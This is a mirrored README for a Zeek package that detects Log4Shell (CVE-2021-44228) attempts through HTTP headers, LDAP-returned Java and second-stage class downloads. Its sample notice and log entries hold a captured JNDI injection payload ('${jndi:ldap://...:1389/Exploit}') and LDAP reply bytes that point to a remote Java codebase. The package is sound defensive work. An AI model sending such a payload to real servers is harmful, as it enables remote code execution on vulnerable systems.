关联漏洞
描述
Log4j Exploit Detection Logic for Zeek
介绍
# CVE-2021-44228
A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J
(CVE-2021-44228) attempts.
- Detects payload contained in HTTP headers: See [Simplifying Detection of
Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for
details.
- [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when a Java file is
returned during an LDAP search. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for
details.
- Detects when second stage Java Class is downloaded, regardless of payload and first stage detection. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details.
## Installation
`$ zkg install cve-2021-44228`
Use against a pcap you already have:
`$ zeek -Cr scripts/__load__.zeek your.pcap`
If you install from a `git clone`'d version of the repository, note that it
defaults to the development branch. Install from `master` or a release for a
more stable version of the package.
## Options and notes:
- `CVE_2021_44228::log` determines if the `log4j` log is generated. Defaults to `T`.
- `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s so ignore. It is a `set[string]` so both IPs and domains can be ignored.
- `CVE_2021_44228::ignorable_orig_hosts` set of `addr`s from known benign scanners that can be ignored.
- `CVE_2021_44228::ignorable_resp_hosts` above but for `resp`s.
- `CVE_2021_44228::try_normalize` determines if normalizing the payload should be attempted. Defaults to `T`.
## Example Notices
This package generates three distinct notices:
1. `LOG4J_ATTEMPT_HEADER`
1. `LOG4J_LDAP_JAVA`
1. `LOG4J_JAVA_CLASS_DOWNLOAD`
`LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data. These are also logged to `log4j` if enabled.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
```
`LOG4J_LDAP_JAVA` detects LDAP downloading Java bytecode. In practice, we see
this happen infrequently enough that it makes for a good proxy detection for
possibly successful exploits.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-16-20-54-13
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-16-20-54-13
```
Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident
that Java downloads more Java. As above, this happens sufficiently rarely to be
a useful proxy detection.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open XXXX-XX-XX-XX-XX-XX
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
#close 2021-12-126-19-17-58
```
## Example Log (`log4j.log`)
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-14-11-50-29
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T
#close 2021-12-14-11-50-29
```
## References
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
1. https://corelight.com/blog/simplifying-detection-of-log4shell
文件快照
[4.0K] /data/pocs/6fe6a5fe26737b3ac84fd2b13a06cb8b723b4af2
├── [1.5K] LICENSE
├── [8.6K] README.md
├── [4.0K] scripts
│ ├── [3.4K] CVE_2021_44228_java_GET.zeek
│ ├── [ 11K] CVE_2021_44228.zeek
│ ├── [ 499] ldap_java.sig
│ ├── [ 84] __load__.zeek
│ └── [8.2K] tests.zeek
├── [4.0K] testing
│ ├── [4.0K] Baseline
│ │ ├── [4.0K] log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ │ └── [ 18K] notice.log
│ │ ├── [4.0K] log4j.ldap_java
│ │ │ ├── [2.2K] notice.log
│ │ │ └── [1.2K] signatures.log
│ │ ├── [4.0K] log4j.log4j-attack
│ │ │ └── [1.7K] notice.log
│ │ ├── [4.0K] log4j.log4j-dns_exfil
│ │ │ └── [1.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-log
│ │ │ ├── [ 613] log4j.log
│ │ │ └── [ 617] log4shell.log
│ │ ├── [4.0K] log4j.log4j-user_agent
│ │ │ └── [2.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-webapp
│ │ │ └── [2.2K] notice.log
│ │ ├── [4.0K] log4j.notice
│ │ │ ├── [1015] http.log
│ │ │ └── [1.3K] notice.log
│ │ └── [4.0K] log4j.unit
│ │ └── [1.7K] output
│ ├── [ 558] btest.cfg
│ ├── [4.0K] Files
│ │ └── [ 192] random.seed
│ ├── [4.0K] log4j
│ │ ├── [ 210] 2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ ├── [ 303] ignore-orig
│ │ ├── [ 301] ignore-resp
│ │ ├── [ 307] ignore-target
│ │ ├── [ 168] ldap_java.zeek
│ │ ├── [ 168] log4j-attack
│ │ ├── [ 171] log4j-dns_exfil
│ │ ├── [ 288] log4j-log
│ │ ├── [ 172] log4j-user_agent
│ │ ├── [ 168] log4j-webapp
│ │ ├── [ 235] notice
│ │ └── [ 154] unit
│ ├── [ 28] Makefile
│ ├── [4.0K] Scripts
│ │ ├── [ 383] diff-remove-timestamps
│ │ ├── [1.3K] get-zeek-env
│ │ └── [ 303] README
│ └── [4.0K] Traces
│ ├── [4.9M] 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap
│ ├── [ 11K] log4j-attack.pcap
│ ├── [4.0K] log4j-dns_exfil.pcap
│ ├── [ 41K] log4j-user_agent.pcap
│ ├── [ 41K] log4j-webapp.pcap
│ ├── [ 87] Readme
│ └── [1.8K] spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap
└── [ 342] zkg.meta
16 directories, 45 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。